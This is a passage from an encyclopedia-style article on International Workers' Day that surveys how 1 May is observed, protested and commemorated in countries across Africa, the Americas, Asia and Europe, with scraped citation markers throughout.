nb 1
]
The following day on 5 May, in
Milwaukee, Wisconsin
, the
state militia
fired on a crowd of strikers killing seven, including a schoolboy and a man feeding chickens in his yard.
[
22
]
International Workers' Day has also been a focal point for
demonstrations
by various socialist, communist and anarchist groups since the Second International. It is one of the most important holidays in communist countries such as
China
,
Vietnam
,
Cuba
,
Laos
,
North Korea
, and the former
Soviet Union
countries. Celebrations in these countries typically feature elaborate workforce parades, including displays of military hardware and soldiers.
International Workers' Day rally in Moscow, 1 May 1960
Eastern Bloc
countries such as the Soviet Union and most countries of central and eastern Europe that were under the rule of
Marxist–Leninist
governments held official Workers' Day celebrations in every town and city, during which party leaders greeted the crowds. Workers carried banners with political slogans and many companies decorated their company cars. The biggest celebration of 1 May usually occurred in the capital of a particular socialist country and usually included a military display and the presence of the president and the secretary general of the party. During the
Cold War
, International Workers' Day became the occasion for large
military parades
in
Red Square
by the
Soviet Union
and attended by the top leaders of the
Kremlin
, especially the
Politburo
, atop
Lenin's Mausoleum
. It became an enduring symbol of that period. In
Poland
, since 1982, party leaders led the official parades. In Hungary, International Workers' Day was officially celebrated under the communist rule, and remains a public holiday. Traditionally, the day was marked by dancing around designated "May trees".
[
30
]
Some factories in socialist countries were named in honour of International Workers' Day, such as
1 Maja Coal Mine
in
Wodzisław Śląski
, Poland. In
East Germany
, the holiday was officially known as
Internationaler Kampf- und Feiertag der Werktätigen für Frieden und Sozialismus
("International Day of the Struggle and Celebration of the Workers for Peace and Socialism"); similar names were used in other Eastern Bloc countries.
Countries and dependencies coloured by observance of International Workers' Day or
Labour Day
:
Labour Day falls or may fall on 1 May
Another public holiday on 1 May
No public holiday on 1 May, but Labour Day on a different date
1 May is a holiday in
Ghana
. It is a day to celebrate all workers across the country. It is celebrated with a parade by trade unions and labour associations.
[
35
]
The parades are normally addressed by the Secretary General of the trade union congress and by regional secretaries in the regions.
[
35
]
Workers from different workplaces through banners and T-shirts identify their companies.
[
35
]
In
Kenya
, 1 May is a public holiday and celebrated as Labour Day. It is a big day addressed by the leaders of the workers' umbrella union body – the
Central Organisation of Trade Unions
(COTU). The Cabinet Secretary in charge of Ministry of Labour and Social Protection (and occasionally the President) address the workers. Each year, the government approves (and increases) the
minimum wage
on Labour Day.
[
36
]
In
Mauritius
, 1 May is a public holiday celebrated as Labour Day. It was celebrated for the first time in Mauritius on 1 May 1938, and for the first time as an official public holiday on 1 May 1950. This was thanks largely to the efforts of Guy Rozemont, Dr. Maurice Curé, Pandit Sahadeo and Emmanuel Anquetil, as a day of special significance for Mauritian workers who for many years had struggled for their social, political and economic rights.
[
39
]
1 May is recognized as public holiday in
Namibia
and celebrated as Workers' Day.
[
42
]
Since 1981, 1 May is a public holiday in
Nigeria
. On the day, people gather while, traditionally, the president of the
Nigeria Labour Congress
and other politicians address workers.
[
43
]
In
South Africa
, Workers' Day has been celebrated as a national public holiday on 1 May each year since 1995.
[
45
]
Workers' Day started to get more attention by African workers in 1928, which saw thousands of workers in a mass march. In 1950, the
South African Communist Party
called for a strike on 1 May in response to the
Suppression of Communism Act
declaring it illegal. Police violence caused the death of 18 people across Soweto. It has its origins within the historical struggles of workers and their trade unions internationally for solidarity between working people in their struggles to win fair employment standards and more importantly, to establish a culture of human and worker rights and to ensure that these are enshrined in international law and the national law.
[
46
]
In 1986, the hundredth anniversary of the Haymarket affair, the
Congress of South African Trade Unions
(COSATU) called for the government to establish an official holiday on 1 May. It also called for workers to stay home from work that day.
[
47
]
COSATU was joined by a number of prominent anti-
apartheid
organizations, including the
National Education Crisis Committee
and the
United Democratic Front (South Africa)
.
[
48
]
The call was also supported by a number of organizations regarded as conservative, such as the
African Teachers' Association of South Africa
, the
National African Federated Chamber of Commerce
, and the Steel and Engineering Industries Federation of South Africa, an organization that represented employers in the metal industries.
[
48
]
More than 1,500,000 workers observed the call and stayed home, as did thousands of students, taxi drivers, vendors, shopkeepers, domestic workers, and self-employed people.
[
48
]
In the following years, 1 May became a popular, if not official, holiday.
[
47
]
As a result of the killings on 1 May 1950 and the success of COSATU's call in 1986, 1 May became associated with resistance to the apartheid government. After its
first universal election in 1994
, 1 May was adopted as a public holiday, celebrated for the first time in 1995.
[
47
]
On its website, the city of
Durban
states that the holiday "celebrate[s] the role played by trade unions and other labour movements in the fight against South Africa's apartheid regime".
[
49
]
In
Tanzania
, it is a public holiday on 1 May and celebrated as Worker's Day.
[
50
]
In
Argentina
, Workers' Day is an official holiday on 1 May, and is frequently associated with labour unions. Celebrations related to labour are held including demonstrations in major cities.
The first Workers' Day celebration was in 1890, when Argentinian unions organized several celebrations in
Buenos Aires
and other cities, at the same time that the international labour movement celebrated it for the first time.
[
55
]
In 1930, it was established as an official holiday by the
Radical Civic Union
president
Hipólito Yrigoyen
. The day became particularly significant during the worker-oriented government of
Juan Domingo Perón
(1946–55).
[
56
]
He permitted and endorsed national recognition of the holiday during his tenure in office.
In
Barbados
, International Workers' Day is a public holiday celebrated on 1 May.
[
57
]
1 May is known as Labour Day and is a holiday.
[
58
]
By custom, it is usually the day on which wage increases (e.g., the national minimum wage) and other labour improvements are announced by the Government. In recent years it was also the day chosen by the Bolivian government to announce the (re)nationalization of strategic sectors of the economy (e.g. hydrocarbons in 2006, telecommunications in 2008, electricity in 2010, etc.).
In
Brazil
, "Workers' Day" is an official holiday celebrated on 1 May, and unions commemorate it with day-long public events.
[
59
]
In Canada,
Labour Day
is celebrated in September. In 1894, the government of Prime Minister
John Sparrow David Thompson
declared the first Monday in September as Canada's official Labour Day. Labor Day in the United States is on the same day.
International Workers' Day is however marked by unions and leftists on 1 May. It is an important day of trade union and community group protest in the province of
Quebec
(though not a provincial
statutory holiday
). Celebration of the International Labour Day (or "International Workers' Day";
French
:
Journée internationale des travailleurs
) in
Montreal
goes back to 1906, organized by the Mutual Aid circle. The tradition had a renaissance at the time of a mass strike in 1972. On the 1973 Labour Day, the first contemporary demonstration was organized by the major trade union confederations; over 30,000 trade unionists took part in this demonstration. Further, it is the customary date on which the
minimum wage
rises.
[
60
]
President
Carlos Ibáñez del Campo
decreed 1 May a national holiday in 1931, in honour of the dignity of workers.
[
61
]
All stores and public services must close for the entire day, and the major trade unions of Chile, represented in the national organization
Workers' United Center of Chile
(Central Unitaria de Trabajadores), organize rallies during the morning hours, with festivities and cookouts in the later part of the day, in all the major cities of Chile. During these rallies, representatives of the major left-wing political parties speak to the assemblies on the issues of the day concerning workers' rights.
1 May has long been recognized as Labour Day and almost all workers respect it as a national holiday.
[
62
]
As in many other countries, it is common to see rallies by the trade unions in all over the main regional capitals of the country.
[
63
]
First celebrated in 1913,
[
64
]
labor day is a public holiday, and at the same time an important day for government activities. On this day, the
President of Costa Rica
gives a speech to the citizens and the
legislature of Costa Rica
about the duties that were undertaken through the previous year. The president of the legislature is also chosen by its members.
[
65
]
This day is known as Labour Day in Cuba. People march in the streets, showing their support to the
Cuban Communist
government and the
Cuban Revolution
during the whole morning.
[
66
]
1 May is a national holiday known as Labour Day and celebrated by workers' parades and demonstration.
In Ecuador, 1 May is an official public holiday known as Labour Day. People do not go to work and spend time with their relatives or gather for demonstrations.
[
68
]
1 May is an official public holiday known as Labour Day.
[
69
]
1 May is an official public holiday known as Labour Day.
[
70
]
1 May is an official public holiday known as Agriculture and Labour Day.
[
71
]
1 May is an official holiday, known as "Labour Day" within Honduras.
[
72
]
1 May is a federal holiday. It also commemorates the
Cananea Strike
of 1906 in the Mexican state of
Sonora
.
1 May is an official public holiday, known as "Labour Day" within Panama.
[
73
]
1 May is an official public holiday, known as "Labour Day" within Paraguay.
[
74
]
1 May is an official public holiday, known as "Labour Day" within Peru.
[
75
]
Socialists in Union Square, New York City, on 1 May 1912
In the United States, a "Labor Day", celebrated on the first Monday in September was given increasing state recognition from 1887, and became an official
federal holiday
in 1894.
[
29
]
Efforts to switch Labor Day from September to 1 May have not been successful.
In 1947, 1 May was established as
Loyalty Day
by the U.S.
Veterans of Foreign Wars
as a way to counter communist influence and recruitment at International Workers' Day rallies.
[
77
]
Loyalty Day was celebrated across the country with patriotic parades and ceremonies, however the growing conflict over U.S. involvement in Vietnam detracted from the popularity of these celebrations.
[
77
]
In 1958, the
American Bar Association
campaigned to have 1 May designated as
Law Day
, which was acknowledged in 1961 by a joint resolution of Congress.
[
78
]
Law Day exercises, such as mock trials and courthouse tours, are often sponsored by the American Bar Association.
In 2006, 1 May was chosen by mostly
Latino
immigrant
groups in the United States as the day for the
Great American Boycott
, a
general strike
of undocumented immigrant workers and supporters to protest
H.R. 4437
, immigration reform legislation that they felt was draconian.
From 10 April to 1 May of that year, immigrant families in the U.S. called for immigrant rights, workers' rights and amnesty for undocumented workers. They were joined by socialist and other leftist organizations on 1 May.
[
81
]
[
82
]
On 1 May 2007, a mostly peaceful demonstration in
Los Angeles
in support of undocumented immigrant workers ended with a widely televised
dispersal by police officers
. In March 2008, the
International Longshore and Warehouse Union
announced that
dockworkers
will move no
cargo
at any
West Coast
ports on 1 May 2008, as a protest against the continuation of the
Iraq War
and the diversion of resources from domestic needs.
[
83
]
On 1 May 2012, members of
Occupy Wall Street
and labor unions held protests together in a number of cities in the United States and Canada to commemorate International Workers' Day and to protest the state of the economy and economic inequality.
[
84
]
[
85
]
On 1 May 2017, immigrants' rights advocates, labor unions and leftists held protests against the immigration and economic policies of President
Donald Trump
in cities throughout the US, Chicago and Los Angeles having some of the largest marches.
[
86
]
[
87
]
On 1 May 2021,
black bloc
protesters clashed with police in Oakland & Portland. Numerous other activities occurred across the country.
[
90
]
In Uruguay, 1 May – Workers' Day – is an official holiday. Even when it is associated with labour unions, almost all workers tend to respect it. Since the late 1990s, the main event takes place at the
First of May Square
in Montevideo.
[
citation needed
]
International Workers' Day celebration in Beijing on 1 May 1952
1 May is a statutory holiday in the
People's Republic of China
. It was a three-day holiday until 2008, but was only one day after 2008.
[
92
]
[
93
]
During a
Golden Week
, surrounding weekends are rescheduled so that workers have seven continuous days off before 2009 and four to five continuous days after 2018.
[
94
]
In
Macau
, it is a public holiday and is officially known as
Dia do Trabalhador
(
Portuguese
for "Workers' Day").
[
97
]
1 May is known as Labor Day in
Taiwan
, an official holiday, though not everybody gets a day off. Students and teachers do not have this day off.
[
98
]
International Workers' Day is not officially designated by the Japanese government as a national holiday, but as it lies between other national holidays, it is a day off work for the vast majority of Japanese workers. Many employers give it as a day off, and otherwise workers take it as "paid leave". 1 May occurs during "
Golden Week
", together with 29 April ("
Shōwa Day
"), 3 May ("
Constitution Memorial Day
"), 4 May ("
Greenery Day
") and 5 May ("
Children's Day
").
[
99
]
Workers generally take the day off work not so much to join street rallies or labour union gatherings, but more to go on holiday for several consecutive days (in Japanese corporate culture, taking weekdays off for personal pleasure is widely frowned upon).
Some major labour unions organize rallies and demonstrations in
Tokyo
,
[
100
]
Osaka
, and
Nagoya
.
[
101
]
Japan has a long history of labour activism and has had a communist and socialist party in the
Diet
since 1945. In 2008, the National Confederation of Trade Unions (
Zenrōren
) held a rally in
Yoyogi Park
attended by 44,000 participants, while the National Trade Unions Council (
Zenrōkyō
) held its International Workers' Day rally at
Hibiya Park
.
[
citation needed
]
Rengō
, the largest Japanese trade union, held its International Workers' Day rally on the following Saturday (3 May), allegedly to distance itself from the more radical labour unions.
[
citation needed
]
Labour Day (
Albanian
:
Dita e punëtorëve
) is an official holiday celebrated on 1 May and thus schools and most businesses are closed.
[
104
]
Labour Day (
Armenian
:
Աշխատանքի օր
,
ashxatanki or
) is an official holiday celebrated on 1 May.
[
105
]
1st of May demonstration of the
SPÖ
at Rathausplatz in
Vienna
Labour Day (
Tag der Arbeit
), officially called
Staatsfeiertag
(state's holiday), is a
public holiday in Austria
. Left parties, especially social democrats organize celebrations with marches and speeches in all major cities. In smaller towns and villages those marches are held the night before.
[
citation needed
]
In Belgium, Labour Day (
Dutch
:
Dag van de Arbeid
,
Feest van de Arbeid
,
French
:
Journée des travailleurs
,
Fête du travail
), is observed on 1 May and is an
official holiday
since 1948.
[
106
]
Various socialist and communist organizations hold parades and other events in different cities.
[
107
]
In Bosnia and Herzegovina, 1 and 2 May (
Bosnian
and
Serbian
:
Prvi Maj
/
Први Mај
,
Croatian
:
Prvi Svibanj
) are an official holiday and day-off for public bodies and schools at the national level. Most people celebrate this holiday by visiting natural parks and resorts. Additionally, in some places public events are organized. In its capital city, Sarajevo, 12 and 13 June are also celebrated as Labour day
[
citation needed
]
due to its many natural parks and springs.
Labour Day is one of the
public holidays in Bulgaria
, where it is known as
Labour Day and International Workers' Solidarity Day
(
Bulgarian
:
Ден на труда и на международната работническа солидарност
) and celebrated annually on 1 May.
[
108
]
The first attempt to celebrate it was in 1890 by the Bulgarian Typographical Association. In 1939, Labour Day was declared an official holiday. Since 1945 the communist authorities in the
People's Republic of Bulgaria
began to celebrate the holiday every year. After the end of socialism in Bulgaria in 1989 Labour Day continues to be an official and public holiday, but state authorities are not committed to the organization of mass events.
[
citation needed
]
In Croatia, 1 May is a national holiday, Labour Day. Many public events are organized and held all over the country where bean soup is given out to all people as a symbol of a real workers' dish. Red carnations are also handed out to symbolise the origin of the day. In
Zagreb
, the capital, a major gathering is in
Maksimir Park
, which is located in the east part of Zagreb. In Split, city on the coast, people go to Marjan, a park-forest at the western end of Split peninsula.
[
109
]
In Cyprus, 1 May (
Greek
:
Εργατική Πρωτομαγιά
) is considered as an official Public Holiday (Labour Day). In general, all stores remain closed in public and private sector. The Labor Union and Syndicates celebrate with various festivals and events across the country.
[
citation needed
]
In the Czech Republic, 1 May is an official and national holiday known as Labour Day (
Czech
:
Svátek práce
).
[
110
]
In
Denmark
, 1 May is not an official holiday, but a variety of individuals, mostly in the public sector, construction industry, and production industry, get a half or a whole day off. It was first celebrated in
Copenhagen
in 1890. The location of the first celebration, the
Fælledparken
, still plays an important part today with speeches by politicians and trade unionists to mark the occasion. Many other events are also held around the country to commemorate the day.
[
111
]
In
Estonia
, 1 May is a public holiday and celebrated as part of May Day (Kevadpüha). It also coincides with Walpurgis Day (volbripäev).
[
citation needed
]
In Finland, 1 May is an official and national holiday. It is mainly celebrated as a feast of students, and spring, called
vappu
or Walpurgis Night.
[
112
]
Finland also celebrates Workers' Day (officially:
suomalaisen työn päivä
, "day of Finnish labour") on the same day.
[
citation needed
]
In France, 1 May is a public holiday called Workers' Day (
French
:
Fête du Travail
). It is, in fact, the only day of the year when employees are legally obliged to be given leave, save professions that cannot be interrupted due to their nature (such as workers in hospitals and public transport).
[
113
]
Demonstrations and marches are a Labour Day tradition in France, where trade unions organize parades in major cities to defend workers' rights.
It is also customary to offer a
lily of the valley
to friends or family. This custom dates back to 1561, when king
Charles IX
, aged 10, waiting for his accession to the throne, gave a lily of the valley to all ladies present. Today, the fiscal administration exempts individuals and workers' organizations from any tax or administrative duties related to the sales of lilies of the valley, provided they are gathered from the wild, and not bought to be resold.
In April 1933, the recently installed
Nazi government
declared 1 May the "Day of National Work", an official state holiday, and announced that all celebrations were to be organized by the government. Any separate celebrations by
Communists
,
Social Democrats
or
labour unions
were banned.
[
citation needed
]
After
World War II
, 1 May remained a state holiday in both
East
and
West Germany
. In communist
East Germany
, workers were
de facto
required to participate in large state-organized parades on International Workers' Day.
[
citation needed
]
Today in Germany it is simply called "Labour Day" (
Tag der Arbeit
), and there are numerous demonstrations and celebrations by independent workers' organizations. Today,
Berlin
witnesses yearly demonstrations on Labour Day, the largest organised by labour unions, political parties, the
far left
and the leftist
Autonomen
.
Since 1987, Labour Day has also become known for riots in some districts of Berlin. After police actions against radical leftists in that year's annual demonstrations, the
Autonomen
scattered and sought cover at the ongoing annual street fair in
Kreuzberg
. Three years prior to the
reunification of Germany
, violent protests would only take place in the former
West Berlin
. The protesters began tipping over police cars, violently resisting arrest, and began building
barricades
after the police withdrew due to the unforeseen resistance. Cars were set on fire, shops plundered and burned to the ground. The police eventually ended the riots the following night. These violent forms of protests by the radical left later increasingly involved participants without political motivation.
[
114
]
Annual street fairs have proven an effective way to prevent riots, and Labour Day in 2005 and 2006 have been among the most peaceful known to Berlin in nearly 25 years. In recent years,
neo-Nazis
and other groups on the
far right
, such as the
National Democratic Party of Germany
, have used the day to schedule public demonstrations, often leading to clashes with left-wing protesters, which turned especially violent in
Leipzig
in 1998 and 2005.
[
citation needed
]
Labour Day violence flared up again in 2010. After an approved far-right demonstration was blocked by leftists, a parade by an estimated 10,000 leftists and anarchists turned violent and resulted in an active response by the
Berlin Police
.
[
115
]
In Greece, 1 May is an optional public holiday, but is treated by workers as a strike. The
Ministry of Labour
retains the right to classify it as an official public holiday on an annual basis, and it customarily does so.
[
116
]
The day is called
Ergatikí Proto-magiá
(
Εργατική Πρωτομαγιά
,
lit.
"Workers' 1 May") and celebrations are marked by demonstrations in which left-wing political parties, anti-authority groups, and workers' unions participate.
On Workers' Day in 2010, there were major protests all over Greece, most notably
Athens
and
Thessaloniki
, by many left, anarchist and communist supporters and some violent clashes with
riot police
who were sent out to contain the protesters. They opposed economic reforms, an end to job losses and wage cuts in the face of the government's proposals of massive public spending cuts. These reforms are to fall in line with the
IMF
-
EU
-
ECB
loan proposals, which demand that Greece liberalize its economy and cut its public spending and private sector wages, which many believe will decrease living standards.
[
117
]
Hungary celebrates 1 May as a national holiday, Workers' Day (
Hungarian
:
A munka ünnepe
), with open-air festivities and fairs all over the country. Many towns raise May poles and festivals with various themes are organized around the holiday. Left-wing parties and trade unions hold public rallies commemorating Labour Day.
[
118
]
In Iceland, Labour Day (
Icelandic
:
Baráttudagur verkalýðsins
) is a public holiday. The first demonstration for workers rights in Iceland occurred in 1923. A parade composed of trade unions and other groups marches through towns and cities across the country and speeches are delivered.
[
119
]
However, some private businesses are open, mainly in the capital.
[
120
]
International Workers' Day parade in
Belfast
, 2011
Traditional 1 May Concert in St. John Lateran square,
Rome
The first International Workers' Day celebration in
Italy
took place in 1890. It started initially as an attempt to celebrate workers' achievements in their struggle for their rights and for better social and economic conditions.
[
citation needed
]
It was abolished under the
Fascist regime
and immediately restored after the
Second World War
. (During the fascist period, a "Holiday of the Italian Labour" (
Festa del lavoro italiano
) was celebrated on 21 April, the date of
Natale di Roma
, when
Rome
was allegedly founded.
[
citation needed
]
) In 1947, following an unexpected electoral victory of the
Popular Democratic Front
in
Sicily
, local secessionists and pro-USA mafia hitmen killed 14 and injured 27 firing machine guns at an International Workers' Day celebration in the
Portella della Ginestra Massacre
.
International Workers' Day is now an important celebration in Italy and is a national holiday regardless of what day of the week it falls. The
Concerto del Primo Maggio
("1st of May Concert"), organized by Italian labour unions in Rome in
Piazza di Porta San Giovanni
has become an important event in recent years. Every year the concert is attended by a large audience of mostly young people and involves the participation of many famous bands and songwriters, lasting from 15:00 until midnight. The concert is usually broadcast live on
Rai 3
.
[
129
]
A second big concert is organised in the city of
Taranto
and it is transmitted locally by
TGR Apulia
.
In Lithuania, 1 May is an official public holiday celebrated as International Work Day (
Lithuanian
:
Tarptautinė darbo diena
).
[
130
]
Celebrations for workers' day were mandatory during the
Soviet occupation
, and carry a negative connotation as a result today. As Lithuania
declared its independence
in 1990, Work Day lost its public holiday status, but regained it in 2001.
[
131
]
[
132
]
In Latvia, Labour Day is an official public holiday celebrated as Convocation of the Constituent Assembly of the Republic of Latvia, Labour Day.
[
133
]
In Luxembourg, 1 May, called the
Dag vun der Aarbecht
("Labour Day"), is a legal holiday traditionally associated with large demonstrations by trade unions in Luxembourg City and other cities.
[
134
]
In Montenegro, 1 May is an official public holiday and a day off work and a day out of school. It is the only official holiday from socialist times that is still officially celebrated.
[
136
]
In the Netherlands, 1 May or Labour Day (
Dutch
:
Dag van de Arbeid
) is not an official holiday. This is due in part to its proximity to the national holiday,
Koningsdag
, which was celebrated on the day before until 2013. Labour movements also didn't see the need to agitate for an extra day off during the
Post–World War II recovery efforts
.
Liberals
who joined the
Labour Party
in this same period also wanted to distance themselves from the
Soviet Union
because of
Cold War
sentiments.
[
137
]
In North Macedonia, 1 May (
Macedonian
:
Ден на Трудот
,
Den na Trudot
) is an official public holiday. Before 2007, 2 may was also a public holiday. People celebrate with friends and family at traditional picnics across the country, accompanied by the usual outdoor games, various grilled meats and beverages. Left organizations and some trade unions organize protests on 1 May.
[
138
]
In Norway, Labour Day (
Norwegian
:
Arbeidernes Dag
) is celebrated 1 May and has been an official public holiday since 1947.
[
139
]
It was first introduced by the workers movement in 1890,
[
140
]
and recognized as an official flag day in 1935.
[
141
]
The program for the day is presented by local unions and labour organizations.
In Poland, since the fall of communism, 1 May is officially celebrated as
Labour Day
.
[
142
]
[
143
]
It is customary for labour activists to organize parades in cities and towns across Poland. The holiday is also commonly referred to as "Labour Day" (
Polish
:
Święto Pracy
).
[
citation needed
]
In Poland, Labour Day is closely followed by
May 3rd Constitution Day
. These two dates combined often result in a
long weekend
called
Majówka
, which may last for up to 9 days from 28 April to 6 May, at the cost of taking only 3 days off. People often travel, and
Majówka
is unofficially considered the start of barbecuing season in Poland.
[
citation needed
]
Between these two, on 2 May, there is a patriotic holiday, the Day of the Polish Flag (
Dzień Flagi Rzeczypospolitej Polskiej
), introduced by a parliamentary act of 20 February 2004. The day, however, does not force paid time off.
[
citation needed
]
In Portugal, Workers' Day (
Portuguese
:
Dia do Trabalhador
) on 1 May was suppressed during the
Estado Novo
dictatorship. The first workers' day demonstration was held a week after the
Carnation Revolution
of 25 April 1974. It is still the largest demonstration in the history of Portugal. It is used as an opportunity for workers and workers' groups to voice their discontent over working conditions in demonstrations across Portugal, the largest being held in Lisbon. It is an official public holiday.
[
144
]
Delegates of the Romanian Communist Party on 1 May 1965
In Romania, 1 May, known as the "International Labour Day" (
Romanian
:
Ziua internațională a muncii
), the "International Workers' Day" (
Ziua internațională a muncitorilor
), or simply "1/First of May" (
1/Întâi Mai
), is an official
public holiday
. During the
communist regime
, like in all former Eastern Bloc countries, the day was marked by large state-organized parades in most towns and cities. After the
Romanian Revolution of 1989
, 1 May continues to be an official public holiday, but without any state organized events or parades. Most people celebrate together with friends and family, organising
picnics
and
barbecues
. It is also the first day of the year when people, especially those from the southeastern part of the country including the capital
Bucharest
, go to spend the day in one of the
Romanian Black Sea resorts
.
[
citation needed
]
Russian Communist Workers' Party demonstration on 1 May 2008 in
Izhevsk
In
Russia
, the "Day of International Workers Solidarity, the 1st of May" (
Russian
:
День международной солидарности трудящихся Первое ма́я
) was celebrated illegally in the country until the
February Revolution
enabled the first legal celebration in 1917. The following year, after the
Bolshevik
seizure of power
, the International Workers' Day celebrations were boycotted by
Mensheviks
,
Left Socialist Revolutionaries
and
anarchists
. It became an important official holiday of the Soviet Union, celebrated with elaborate popular parade in the centre of the major cities. The biggest celebration was traditionally organized in
Red Square
, where the
General Secretary of the CPSU
and other party and government leaders stood atop
Lenin's Mausoleum
and waved to the crowds. Until 1969, the holiday was marked by
military parades
throughout the
Russian SFSR
and the union republics.
[
citation needed
]
The following was the order of the march past:
In 1991, which preceded the last year that demonstrations were held in Red Square, International Workers' Day grew into high-spirited political action. Around 50,000 people participated in a rally in Red Square in 1991 after which the tradition was interrupted for 13 years. In the early post-Soviet period the holiday turned into massive political gatherings of supporters of radically minded politicians. For instance, an action dubbed as "a rally of communist-oriented organisations" was held in Red Square in 1992. The rally began with performance of the Soviet Union anthem and raising the Red Flag and ended with appeals from the leader of opposition movement Working Moscow,
Viktor Anpilov
, "for early dismissal of President
Boris Yeltsin
, ousting
Moscow Mayor
Gavriil Popov
from power and putting the latter on trial". Since 1992, International Workers' Day is officially called "Spring and Labor Day", and remains a major holiday in present-day Russia.
After the demonstrators broke through the cordon, OMON went on a counterattack near house 37 along Leninsky Avenue. "The demonstrators fought fiercely using banner poles." To overcome the barriers, the demonstrators used trucks as rams. One of the rams resulted in severe injuries to OMON Sergeant Vladimir Tolokneyev, who died four days later. Media reports on the number of victims varied: the initial figure of 150 people soon quadrupled.
[
149
]
1 May is celebrated annually by communists, anarchists, and other organizations as the Day of International Solidarity of Workers. These events are accompanied by the promotion of sharp social and political slogans ("Government of bankrupts - resign!", "WE do not want to pay for YOUR crisis!", "Self-organization! Self-government! Self-defense!" etc.).
[
150
]
[
151
]
The slogans of official events organized by the authorities are far from the historical roots of the Labour Day demonstrations: "Putin's plan is a plan for Victory!", "Bonuses for pensioners", "Three kids in a family is the norm!".
[
154
]
A more radical attitude to the holiday in 2009 was expressed by the head of the metropolitan branch of the
Right Cause
party, Igor Trunov: "To be honest, I didn't really want to celebrate 1 May, because I don't stand in solidarity with the workers of Chicago, where this holiday came from".
[
155
]
On 1 May 2013, several hundred thousand workers took to the streets of Russian cities. More than 100,000 people took part in the Labour Day demonstration in Moscow.
[
156
]
Since 2014 a national civil parade has been held on 1 May on Red Square, with similar events held in major cities and regional capitals.
In 2016, the celebration of Easter and Labour Day overlapped,
[
157
]
which led to the abandonment of Labour Day events in some regions.
[
158
]
In Serbia, 1 May (and also 2 May) is a day off work and a day out of school. It is one of the major popular holidays, and the only official holiday from socialist times that is still officially celebrated. People celebrate it all over the country. By tradition 1 May is celebrated by countryside picnics and outdoor barbecues. May is marked by warm weather in Serbia. In
Belgrade
, the capital, most people go to
Avala
or
Košutnjak
, which are parks located in
Rakovica
and
Čukarica
. People go around the country to enjoy nature. A major religious holiday of
Djurdjevdan
is on 6 May so quite often days off work are given to connect these two holidays and weekend, creating a small spring break. 1 May is celebrated by most of the population regardless of political views.
In Slovenia, 1 May and 2 May are public holidays. There are many official events all over the country to celebrate workers' day. In
Ljubljana
, the capital, the main celebration is held on
Rožnik Hill
in the city. On the night of 30 April, bonfires are traditionally burned.
[
160
]
In Spain, the first Workers' Day (
Día del Trabajador
) was celebrated in 1889 but only became a public holiday with the beginning of the
Spanish Second Republic
in 1931. It was banned afterwards by the
Franco regime
in 1937.
[
161
]
The year after it was decreed that the "Fiesta de la Exaltación del Trabajo," or Labor Festival, be held on 18 July, the anniversary of the
Francoist
military coup
, instead.
[
162
]
After the death of
Francisco Franco
in 1975 and the move towards democracy, the first large rallies on 1 May began again in 1977. It was re-introduced as a public holiday in 1978.
[
163
]
Commonly, peaceful demonstrations and parades occur in major and minor cities.
[
164
]
[
165
]
Recognizing the central contributions of workers and international worker solidarity in Swedish social, economic, political and cultural development, International Workers' Day demonstrations are an important part of Swedish politics and culture for social democrats, left parties, and unions. In Stockholm the
Social Democratic Party
always marches towards
Norra Bantorget
, the historical, physical centre of the Swedish labour movement, where they hold speeches in front of the headquarters of the
Swedish Trade Union Confederation
, while the smaller
Left Party
marches in larger numbers
[
166
]
towards
Kungsträdgården
.
In Switzerland, the status of 1 May differs depending on the
canton
and sometimes on the municipality. Labour Day is known as
Tag der Arbeit
in German-speaking cantons, as
Fête du travail
in the French-speaking cantons, and as
Festa del lavoro
in the Italian-speaking canton of
Ticino
.
In the cantons of
Basel-Landschaft
,
Basel-Stadt
,
Jura
,
Neuchâtel
, and
Zürich
, Labour Day is an official public holiday equal to Sundays, based on federal law (
Bundesgesetz über die Arbeit in Industrie, Gewerbe und Handel
, article 20a).
In the cantons of
Schaffhausen
,
Thurgau
, and
Ticino
, Labour Day is an official "day off" (
Ruhetag
). This is equal in practice to an official public holiday, but is not based on federal law and cantonal regulations may differ in details.
In the canton of
Solothurn
it is an official half-day holiday (starting at 12 noon).
In the canton of
Fribourg
, public servants get the afternoon off, many companies follow this practice.
In the canton of
Aargau
it is not an official holiday, but most employees get the afternoon off.
In the municipalities of
Hildisrieden
and
Schüpfheim
(both in the canton of
Lucerne
) as well as in
Muotathal
(canton of
Schwyz
), 1 May is an official public holiday, but as commemoration day of the local
patron saint
, not as Labour Day. In the other parts of the cantons of Lucerne and
Schwyz
, 1 May is a regular work day.
In all other cantons, 1 May is a regular work day.
[
171
]
The largest Labour Day celebrations in Switzerland are held in the city of
Zürich
. Each year,
Zürich
's 1 May committee, together with the
Swiss Federation of Trade Unions
, organizes a festival and 1 May rally. It is the largest rally held on a regular basis in Switzerland.
[
172
]
Istanbul May Day clashes in 2013
Workers marching to
Taksim Square
, 1 May 2012
1 May is an official holiday celebrated in Turkey. It was a holiday as "Spring Day" until 1981 when it was canceled after the
1980 coup d'état
. In 2009, the Turkish government restored the holiday after some casualties and demonstrations.
Taksim Square
is the centre of the celebrations due to the
Taksim Square massacre
.
[
citation needed
]
Workers' Day was first celebrated in 1912 in
Istanbul
and in 1899 in
İzmir
. After the establishment of the Turkish Republic in 1923, the celebrations continued. In 1924, it was forbidden by a decree of the
Kemalist government
in both 1924 and 1925, demonstrations were intervened by arm floats. In 1935, The National Assembly declared 1 May as "Spring Day" to be a public holiday.
[
173
]
During the events leading to the 1980 Turkish coup d'état, a massacre occurred on 1 May 1977 (Taksim Square massacre), in which unknown people (
agents provocateurs
) opened fire on the crowd. The crowd was the biggest in Turkish workers' history with the number of people approximating 500,000. In the next two years, provocations and confusion continued and peaked before the 1980 coup d'état. The 1 May holiday was cancelled after the coup d'état. Still, demonstrations continued with small crowds, and in 1996, three people were killed by police bullets, and a plain-clothes man who spied in the crowd was revealed and lynched by workers. On the same evening, a video broadcast on TV showed that two participants in the demonstration were lynched by far right-wing nationalist groups and this lynching occurred in front of police forces who were watching the scene with happy faces. Thus, 1 May 1996 has been remembered by workers' movements.
[
173
]
In 2007, the 30th anniversary of the Taksim Square Massacre, leftist workers' unions wanted to commemorate the massacre in
Taksim Square
. Since the government would not let them into the square, 580–700 people were stopped and 1 person died under police control. After these events, the government declared 1 May as "Work and Solidarity Day" but not as a holiday. In the next year, the day was declared as a holiday, but people were still not allowed to gather in Taksim Square.
[
174
]
The year 2008 was remembered with police violence in Istanbul. Police fired tear gas grenades among the crowds, and into hospitals and a primary school. Workers pushed forward so that in 2010, 140,000 people gathered in Taksim, and in 2011 there were more than half a million demonstrators.
[
citation needed
]
After three years of peaceful meetings in 2013, meetings in Taksim Square were forbidden by the government. Clashes occurred between police and workers;
water cannon
and
